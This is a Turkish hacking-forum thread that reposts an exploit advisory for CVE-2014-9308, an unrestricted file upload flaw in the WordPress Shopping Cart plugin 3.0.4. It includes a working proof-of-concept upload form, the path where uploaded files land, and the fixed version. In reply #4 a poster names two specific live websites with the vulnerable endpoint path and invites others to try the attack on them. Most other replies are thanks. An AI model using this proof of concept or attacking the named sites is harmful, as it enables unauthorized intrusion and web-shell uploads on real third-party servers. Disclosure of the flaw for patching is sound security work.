Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
#1
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 29-10-2014
# Software Link: https://wordpress.org/plugins/wp-easycart/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9308
# Category: webapps


1. Description

Any registered user can upload any file because of incorrect if statement inside banneruploaderscript.php

PHP Kod:
http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html 


2. Proof of Concept

Login as regular user (created using wp-login.php?action=register):

PHP Kod:
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <
input type="hidden" name="datemd5" value="1">
    <
input type="file" name="Filedata">
    <
input value="Upload!" type="submit">
</
form
File will be visible:
PHP Kod:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension% 

3. Solution:


Update to version 3.0.9
https://downloads.wordpress.org/plugin/w....3.0.9.zip
Beğenenler:
#2
teşekkürler elinize sağlık kiss
Beğenenler:
#3
güzell. eline sağlık
Beğenenler:
#4
süper bir açık değerlendirilmesi gerekiyor eline sağlık kardeşim exciting
ama çok az site çıkıyor.
Denemek isteyene site =>
1 - herocatscomic.com/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php
2 - supracompanies.com/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php
www.deccal.org


Beğenenler:
#5
Alışveriş Sitesi Bayılırım kiss kiss
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#6
eline sağlık abi
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 183 Dün, Saat: 18:42
Son Yorum: the_zizil
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 73 4,378 04-12-2016, Saat: 14:05
Son Yorum: SheelWe
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 537 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
  sacro CMS unrestricted upload You LosT 3 191 30-11-2016, Saat: 02:51
Son Yorum: 0xfans
  WordPress store theme Upload Acıgı archavin 72 4,772 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
Anahtar Kelimeler

WordPress Shopping Cart 3.0.4 - Unrestricted File Upload indir, WordPress Shopping Cart 3.0.4 - Unrestricted File Upload Videosu, WordPress Shopping Cart 3.0.4 - Unrestricted File Upload Online izle, WordPress Shopping Cart 3.0.4 - Unrestricted File Upload Bedava indir, WordPress Shopping Cart 3.0.4 - Unrestricted File Upload Yükle, WordPress Shopping Cart 3.0.4 - Unrestricted File Upload Hakkında, WordPress Shopping Cart 3.0.4 - Unrestricted File Upload Nedir, WordPress Shopping Cart 3.0.4 - Unrestricted File Upload Free indir, WordPress Shopping Cart 3.0.4 - Unrestricted File Upload Oyunu, WordPress Shopping Cart 3.0.4 - Unrestricted File Upload Download


1 Ziyaretçi